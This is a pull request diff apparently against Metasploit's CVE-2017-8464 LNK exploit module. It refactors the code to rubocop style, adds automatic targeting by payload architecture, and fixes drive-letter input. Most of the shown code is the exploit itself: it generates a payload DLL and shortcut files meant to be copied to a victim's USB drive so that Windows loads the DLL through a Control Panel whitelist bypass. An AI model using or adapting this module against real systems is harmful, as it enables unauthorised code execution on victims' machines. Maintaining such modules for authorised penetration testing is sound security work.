### PR TITLE
Cve 2017 8464 lnk rce

### DIFF
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -44,6 +44,10 @@ Style/GuardClause:
   Enabled: false
   Description: 'This often introduces bugs in tested code'
 
+Style/NegatedIf:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
 Style/ConditionalAssignment:
   Enabled: false
   Description: 'This is confusing for folks coming from other languages'

--- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
+++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{dll_path} created, copy it to the root folder of the target USB drive")
 
     if datastore['DRIVE']
-      lnk = generate_link("#{datastore['DRIVE']}:\\#{dll_name}")
+      lnk = generate_link("#{datastore['DRIVE'].split(':')[0]}:\\#{dll_name}")
       lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
       lnk_path = store_file(lnk, lnk_filename)
       print_status("#{lnk_path} created, copy to the target USB drive")

--- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
+++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
@@ -12,73 +12,77 @@ class MetasploitModule < Msf::Exploit::Remote
   attr_accessor :exploit_dll_name
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'            => 'LNK Code Execution Vulnerability',
-      'Description'     => %q{
-        This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
-        that contain a dynamic icon, loaded from a malicious DLL.
+    super(
+      update_info(
+        info,
+        'Name'            => 'LNK Code Execution Vulnerability',
+        'Description'     => %q{
+          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
+          that contain a dynamic icon, loaded from a malicious DLL.
 
-        This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
-        similar except an additional SpecialFolderDataBlock is included. The folder ID set
-        in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
-        the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
-        DLL file.
-      },
-      'Author'          =>
-        [
-          'Uncredited',   # vulnerability discovery
-          'Yorick Koster' # msf module
-        ],
-      'License'         => MSF_LICENSE,
-      'References'      =>
-        [
-          ['CVE', '2017-8464'],
-          ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
-          ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup
-          ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format
-          ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],
-          ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']
-        ],
-      'DefaultOptions'  =>
-        {
-          'EXITFUNC'    => 'process',
+          This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
+          similar except an additional SpecialFolderDataBlock is included. The folder ID set
+          in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
+          the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
+          DLL file.
         },
-      'Arch'            => [ARCH_X86, ARCH_X64],
-      'Payload'         =>
-        {
-          'Space'       => 2048,
-        },
-      'Platform'        => 'win',
-      'Targets'         =>
-        [
-          [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
-          [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
-        ],
-      'DefaultTarget'  => 0, # Default target is 64-bit
-      'DisclosureDate'  => 'Jun 13 2017'))
+        'Author'          =>
+          [
+            'Uncredited',   # vulnerability discovery
+            'Yorick Koster' # msf module
+          ],
+        'License'         => MSF_LICENSE,
+        'References'      =>
+          [
+            ['CVE', '2017-8464'],
+            ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
+            ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup
+            ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format
+            ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],
+            ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']
+          ],
+        'DefaultOptions'  =>
+          {
+            'EXITFUNC'    => 'process'
+          },
+        'Arch'            => [ARCH_X86, ARCH_X64],
+        'Payload'         =>
+          {
+            'Space'       => 2048
+          },
+        'Platform'        => 'win',
+        'Targets'         =>
+          [
+            [ 'Automatic',   { 'Arch' => ARCH_ANY } ],
+            [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
+            [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
+          ],
+        'DefaultTarget' => 0, # Default target is 64-bit
+        'DisclosureDate' => 'Jun 13 2017'
+      )
+    )
 
     register_options(
       [
         OptString.new('FILENAME', [false, 'The LNK file', 'Flash Player.lnk']),
         OptString.new('DLLNAME', [false, 'The DLL file containing the payload', 'FlashPlayerCPLApp.cpl']),
         OptString.new('DRIVE', [false, 'Drive letter assigned to USB drive on victim\'s machine'])
-      ])
+      ]
+    )
 
     register_advanced_options(
       [
         OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
-      ])
+      ]
+    )
   end
 
   def exploit
-    opts = {}
-    if target['Arch'] == ARCH_X64
-      datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
-      datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x64_windows.dll')
-    else
-      datastore['EXE::Path'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
-      datastore['EXE::Template'] = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464', 'template_x86_windows.dll')
-    end
+    path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
+    arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
+    datastore['EXE::Path'] = path
+    datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
+
     dll = generate_payload_dll
     dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
     dll_path = store_file(dll, dll_name)
@@ -90,16 +94,13 @@ class MetasploitModule < Msf::Exploit::Remote
       lnk_path = store_file(lnk, lnk_filename)
       print_status("#{lnk_path} created, copy to the target USB drive")
     else
-      # HACK the vulnerability doesn't appear to work with UNC paths
+      # HACK: the vulnerability doesn't appear to work with UNC paths
       # Create LNK files to different drives instead
       # Copying all the LNK files will likely trigger this vulnerability
       ('D'..'Z').each do |i|
-        lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
-        if lnk_filename =~ /(.*)\.(.*)/
-          lnk_filename = "#{$1}_#{i}.#{$2}"
-        else
-          lnk_filename = "#{lnk_filename}_#{i}.lnk"
-        end
+        fname, ext = (datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk").split('.')
+        ext = 'lnk' if ext.nil?
+        lnk_filename = "#{fname}_#{i}.#{ext}"
         lnk = generate_link("#{i}:\\#{dll_name}")
         lnk_path = store_file(lnk, lnk_filename)
         print_status("#{lnk_path} created, copy to the target USB drive")
@@ -174,19 +175,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Store the file in the MSF local directory (eg, /root/.msf4/local/)
   def store_file(data, filename)
-    ltype = "exploit.fileformat.#{self.shortname}"
+    @ltype = "exploit.fileformat.#{@shortname}"
 
-    if ! ::File.directory?(Msf::Config.local_directory)
+    if !::File.directory?(Msf::Config.local_directory)
       FileUtils.mkdir_p(Msf::Config.local_directory)
     end
 
-    if filename and not filename.empty?
-      if filename =~ /(.*)\.(.*)/
-        ext = $2
-        fname = $1
-      else
-        fname = filename
-      end
+    if filename && !filename.empty?
+      fname, ext = filename.split('.')
     else
       fname = "local_#{Time.now.utc.to_i}"
     end


### PR DESCRIPTION
This is just some code cleanup based on rubocop rules (we're trying to get these down to a reasonable subset for automatic fixups later), adding auto-targeting support based on the payload selected, and it lets you set the drive letter like 'e:', which I did accidentally a number of times before I figured out why it didn't work :)